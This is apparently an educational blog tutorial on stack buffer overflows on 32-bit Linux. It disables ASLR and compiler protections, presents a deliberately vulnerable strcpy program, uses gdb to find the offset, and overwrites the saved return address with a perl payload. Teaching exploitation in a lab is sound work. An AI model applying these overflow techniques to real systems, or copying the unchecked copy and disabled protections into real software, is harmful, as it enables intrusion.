Introduction to the art of exploiting on Linux-x86

Creating an exploit is a complex process that requires a lot of technical knowledge, patience, and a touch of intuition. I'm not an expert in this field; in fact, I have only just set out on my first journey into this wonderful world. I will explain the techniques I learn in a practical and clear way. All tests will be performed on the 32-bit x86 architecture because it is easier to follow, although the concepts carry over to x86_64. We will start with a simple program vulnerable to what is known as a stack overrun, stack smashing, or stack buffer overflow.

The material presented here is purely educational and is not intended to incite the use of this knowledge for destructive purposes. That being said, I am not responsible for any misuse of this information, as the crime does not lie in the knowledge itself, but in its use.

To perform all our tests, we will install a virtual machine where we can experiment safely, because certain kernel protections have to be disabled and the binaries have to be compiled with several of the compiler's security features turned off. This gives us an OS on which to test every method conceptually. I personally chose Debian x86, but any other distro would work just as well.

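The change to be made at the OS level is to disable address space layout randomization (ASLR), as root:

echo 0 > /proc/sys/kernel/randomize_va_space

The protections to be disabled in the compiler are the stack protector (canaries), source fortification, RELRO, and the non-executable stack: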

gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack
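Before going further, it can be worth confirming that the kernel setting actually took effect. The following is a minimal sketch, not part of the original program: read_aslr_mode and describe_aslr_mode are hypothetical helper names, and the meaning attached to each value follows the Linux kernel's sysctl documentation.

```c
#include <assert.h>
#include <stdio.h>

/*
 * Hypothetical helper: reads the ASLR mode from a procfs-style file.
 * Returns 0, 1 or 2 on success, or -1 if the file cannot be opened or
 * does not contain one of those values.
 */
int read_aslr_mode(const char *path) {
    assert(path != NULL);

    FILE *f = fopen(path, "r");
    if (f == NULL) {
        return -1;
    }

    int mode = -1;
    if (fscanf(f, "%d", &mode) != 1 || mode < 0 || mode > 2) {
        mode = -1;
    }
    fclose(f);
    return mode;
}

/* Human-readable meaning of each mode. */
const char *describe_aslr_mode(int mode) {
    switch (mode) {
    case 0:  return "disabled";
    case 1:  return "stack, mmap base and VDSO randomized";
    case 2:  return "mode 1 plus heap (brk) randomized";
    default: return "unknown";
    }
}
```

Calling describe_aslr_mode(read_aslr_mode("/proc/sys/kernel/randomize_va_space")) after the echo command above should yield "disabled"; any other answer means the addresses used later in this article will change between runs.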

First of all, we must explain a few concepts needed to understand the techniques presented later. A program executes sequentially, that is, one instruction after another. The address of the next instruction to execute is held in a register called the instruction pointer (IP, named EIP on 32-bit x86). Execution can be diverted to functions that perform specific tasks. The program follows its normal flow until it reaches a function call. At that moment, the call instruction saves the return address (the value EIP would otherwise have taken next) in RAM and jumps to the function. When the function finishes, that saved value is loaded back into EIP, and execution resumes in the main flow of the program.
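To make the saved return address tangible, here is a minimal sketch that asks the compiler for it. It assumes GCC or Clang, since __builtin_return_address is a compiler builtin and not standard C, and both function names are hypothetical, chosen only for this illustration.

```c
#include <stdio.h>

/*
 * Hypothetical helper for illustration. noinline forces a real call,
 * so a return address is actually saved on the stack.
 */
__attribute__((noinline)) void *saved_return_address(void) {
    /* GCC/Clang builtin: the address execution resumes at after this call. */
    return __builtin_return_address(0);
}

/* Prints the return address saved by the call made inside this function. */
void show_saved_return_address(void) {
    printf("the callee will return to %p\n", saved_return_address());
}
```

The printed value should fall inside the code of show_saved_return_address, just after its call instruction. That saved value is what a stack overrun replaces.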

An example will make it easier to understand. Let’s imagine that we have the following program:

#include <string.h>
#include <stdlib.h>
#include <stdio.h>

/* Deliberately vulnerable: strcpy() never checks that arg fits in nombre. */
void func(char *arg) {
    char nombre[32];
    strcpy(nombre, arg);
    printf("Alfaexploit overrun proof of concept, welcome: %s\n", nombre);
}

int main(int argc, char *argv[]) {
    /* Exactly one argument is expected: the user's name. */
    if (argc != 2) {
        printf("Usage: %s NAME\n", argv[0]);
        exit(1);
    }

    func(argv[1]);
    printf("End of program\n");
    return 0;
}

We compile the program:

gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack overrun.c -o overrun

This program simply expects one argument, the user's name, and calls func with it. When func is called, its part of memory holds, from higher to lower addresses: the argument arg, the saved return address, the saved frame pointer (EBP), and the local buffer nombre.

The portion of RAM a program uses to hold this per-call data is commonly called the stack. On x86 the stack grows toward lower memory addresses, whereas strcpy fills a buffer toward higher addresses, so writing past the end of a local buffer runs into whatever was pushed before it. Part of the stack stores a copy of the instruction pointer (EIP) taken at the time of the function call: the return address. The program never checks the length of the data it receives; it copies it blindly into the nombre variable. Taking advantage of this carelessness, we can make the input long enough to reach the saved EIP, so that func returns to a memory address of our choosing instead of the one saved when it was called.
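The layout just described can be modelled safely with a plain struct, without overflowing anything for real. This is only a sketch under stated assumptions: frame_model, read_le32 and simulate_overrun are hypothetical names, the 8 bytes of padding are inferred from the 44-byte offset measured with gdb later in this article, and the original return address 0x08048519 is derived from the objdump listing shown further down (the 5-byte call at 0x8048514).

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Model of func's frame, lowest address first. The 8 padding bytes are an
 * assumption picked to match the 44-byte offset this article measures
 * with gdb; other compilers or flags may lay the frame out differently.
 */
struct frame_model {
    uint8_t nombre[32];   /* the local buffer */
    uint8_t padding[8];   /* assumed compiler padding */
    uint8_t saved_ebp[4]; /* caller's frame pointer */
    uint8_t saved_eip[4]; /* return address pushed by call */
};

_Static_assert(offsetof(struct frame_model, saved_eip) == 44,
               "saved EIP sits 44 bytes after the start of nombre");

/* Decode 4 bytes stored least significant byte first. */
uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/*
 * Copies len input bytes into the model starting at nombre, continuing
 * past its end like an unchecked copy would. The length is clamped to
 * the model's size so the simulation itself never goes out of bounds.
 * Returns the saved return address after the copy.
 */
uint32_t simulate_overrun(const uint8_t *input, size_t len) {
    /* 0x08048519: the instruction after "call func" at 0x8048514. */
    static const uint8_t original_ret[4] = {0x19, 0x85, 0x04, 0x08};
    struct frame_model frame;

    memset(&frame, 0, sizeof frame);
    memcpy(frame.saved_eip, original_ret, sizeof original_ret);

    if (len > sizeof frame) {
        len = sizeof frame;
    }
    memcpy(&frame, input, len);
    return read_le32(frame.saved_eip);
}
```

With a short input such as "kr0m" the function returns the untouched 0x08048519. With 44 filler bytes followed by ac 84 04 08 it returns 0x080484ac, which is the effect the real exploit relies on. The model ignores the terminating NUL byte that strcpy also writes.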

If we run the program with a normal input:

root@reversedbox:~# ./overrun kr0m

 Alfaexploit overrun proof of concept, welcome: kr0m
End of program

As a test, we will overwrite the saved EIP with the address of func itself, so that when func finishes it returns to its own beginning and the printf runs a second time. To obtain the function's address, we can use the objdump tool as follows:

objdump -d overrun | grep func

080484ac <func>:
 8048514: e8 93 ff ff ff call 80484ac <func>

NOTE: x86 is little-endian, so the address 0x080484ac is stored in memory least significant byte first: ac 84 04 08
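The byte reordering in the note above can be written out explicitly. This is a small sketch; encode_le32 is a hypothetical helper name, not something from the original program.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store a 32-bit value least significant byte first (little-endian). */
void encode_le32(uint32_t value, uint8_t out[4]) {
    assert(out != NULL);

    out[0] = (uint8_t)(value & 0xff);
    out[1] = (uint8_t)((value >> 8) & 0xff);
    out[2] = (uint8_t)((value >> 16) & 0xff);
    out[3] = (uint8_t)((value >> 24) & 0xff);
}
```

Passing 0x080484ac fills the output with ac, 84, 04, 08 in that order, which is the sequence that has to appear at the end of the input.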

We run the program with an argument crafted to overwrite the saved EIP with the address of func:

root@reversedbox:~# ./overrun `perl -e 'print "A"x44 . "\xac\x84\x04\x08"'`

 Alfaexploit overrun proof of concept, welcome: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¬
 Alfaexploit overrun proof of concept, welcome: Uåì8D$E?$è¬þÿÿE?D$Ç$èþÿÿÉÃUåäðìt!E
Segmentation fault

Ouuuu yeahhh baby, we have managed to divert the normal flow of the program's execution thanks to a programming error. What we did was pass an argument made of the character A repeated 44 times, which is just filler to reach the saved EIP, followed by the address of func, which overwrites the original saved value. Since this second call was not set up by main, func reads whatever happens to be on the stack as its argument, which is why the second welcome line prints garbage before the program finally crashes.

NOTE: The fact that the character A has to be entered 44 times is not due to an epiphany. This value is calculated by loading the program in gdb (the GNU debugger). The simplest technique is to feed the program inputs of known length made of recognizable values such as letters. When the program crashes, gdb reports the address it tried to jump to, which is the overwritten EIP. Reading the bytes of that address as ASCII tells us which letters landed on the saved EIP and therefore how many bytes separate the start of the buffer from it.

We install gdb:

apt-get install gdb

We load the program:

gdb overrun

We run the program normally:

(gdb) run kr0m

Starting program: /root/overrun kr0m
 Alfaexploit overrun proof of concept, welcome: kr0m
End of program

[Inferior 1 (process 3525) exited normally]

But if we now run it with an input in which each letter of the alphabet is repeated four times, we get:

(gdb) run AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

Starting program: /root/overrun AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

 Alfaexploit overrun proof of concept, welcome: AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

Program received signal SIGSEGV, Segmentation fault.
0x4c4c4c4c in ?? ()

We can see that it tried to return to the address 0x4c4c4c4c; in other words, EIP held 0x4c4c4c4c when func returned to the main flow of the program. Since 0x4c is the ASCII code for L, the bytes 0x4c4c4c4c are LLLL, which tells us how much padding is needed. Counting the characters from AAAA to KKKK gives 44 (11 letters of 4 bytes each), exactly the number of A characters we generated with perl:

root@reversedbox:~# ./overrun `perl -e 'print "A"x44 . "\xac\x84\x04\x08"'`
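The counting done by hand above can be turned into a tiny helper. This is a sketch that assumes the exact AAAABBBB...ZZZZ pattern used in this article; offset_from_fault is a hypothetical name.

```c
#include <stdint.h>

/*
 * Given the faulting EIP from a run with the AAAABBBB...ZZZZ pattern,
 * returns the byte offset of the saved return address from the start of
 * the input, or -1 if the value is not four copies of the same
 * uppercase letter (for example when the pattern did not land aligned).
 */
int offset_from_fault(uint32_t eip) {
    uint8_t b0 = (uint8_t)(eip & 0xff);
    uint8_t b1 = (uint8_t)((eip >> 8) & 0xff);
    uint8_t b2 = (uint8_t)((eip >> 16) & 0xff);
    uint8_t b3 = (uint8_t)((eip >> 24) & 0xff);

    if (b0 != b1 || b1 != b2 || b2 != b3) {
        return -1;
    }
    if (b0 < 'A' || b0 > 'Z') {
        return -1;
    }
    /* Each earlier letter contributed 4 bytes of padding. */
    return (b0 - 'A') * 4;
}
```

For the crash reported by gdb, offset_from_fault(0x4c4c4c4c) gives 44. A mixed value such as 0x4c4c4d4c is rejected with -1 because the return address would then straddle two letters, and the offset would have to be worked out by hand.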

This is just a conceptual introduction and a basic example of its operation. As I acquire more skill in the new arts, I will publish more complex and entertaining articles ;)
